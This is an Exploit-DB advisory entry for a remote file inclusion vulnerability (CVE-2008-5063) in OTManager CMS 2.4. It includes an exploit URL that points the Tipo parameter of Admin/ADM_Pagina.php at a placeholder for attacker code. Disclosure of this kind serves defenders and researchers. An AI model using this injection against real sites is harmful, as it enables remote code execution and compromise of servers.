OTManager CMS 2.4 Tipo Remote File Inclusion Vulnerability

2008-11-10T00:00:00
ID EDB-ID:7077
Type exploitdb
Reporter Colt7r
Modified 2008-11-10T00:00:00

Description

OTManager CMS 2.4 (Tipo) Remote File Inclusion Vulnerability. CVE-2008-5063. Webapps exploit for php platform

                                        
                                            -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  OTManager 2.4 Remote File Inclusion (RFI) Vulnerability

  - Security flaw discovered by Colt7r
  - CONTACT: colt7r |@| bsdmail.org

  - Affected Software: OTManager 2.4
  - Risk: HIGH
  - Exploit: http://host/Admin/ADM_Pagina.php?Tipo=[EVIL CODE]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-10]